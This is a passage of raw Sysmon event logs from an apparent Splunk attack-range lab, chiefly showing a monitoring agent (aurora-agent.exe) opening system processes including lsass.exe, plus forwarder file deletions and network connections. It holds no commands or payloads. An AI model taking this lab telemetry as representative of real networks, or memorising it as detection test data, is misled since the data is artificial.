Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041796Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041795Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.860{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.842{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041792Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.828{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041791Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.810{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041790Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041789Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041788Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041787Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.773{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041786Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000041785Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.752{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=812912D772E0D126688ED66A1B0FD6F7,SHA256=DCF40FB625B4F5C0FBAB3F44FEA247BB7A652A862DBF25160E1B4A4FCE40BB6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041784Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.724{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:51.720{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000041812Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:50.614{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56295-false10.0.1.12-8000- 10341000x800000000000000041811Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:52.249{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000016466Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:53.013{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12BE30C3E694DC1D7812A9984E03C198,SHA256=2EC497510657718FB60983E3F8E9A2AA41959EB9770D86E335C106BBEBE6E986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041814Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:53.576{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C5450D7700F1DC1AAFB77D7DE71A02E0,SHA256=9DC40548133BBED3A2B39EBF0773B048453B2D955BD81BE4DCEFA947AE30F228,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041813Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:53.234{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B03339416BC63E44C5EE040AB810208A,SHA256=2241DEFF7A1E7C39999500F1A88773319342D8891A1A0EC6EA290F611C7F4761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000016468Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:52.955{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50094-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016467Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:21:54.096{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65A81DD661CB2171244F48980A328B34,SHA256=D1FAACECD9D43CA2C74256F8459ED83E91C4EF99D23C1620960AAA20AEACDBCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.914{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.912{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.911{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.910{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.908{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000041832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.838{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=543D1C837C24F937AE2E8F98E3A7E3E2,SHA256=E789FA68B2C6E5648E803E1DE07986C6C4FE27E39BEDA4ACA1E0F38383B3A5B0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.832{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.823{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:21:54.817{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 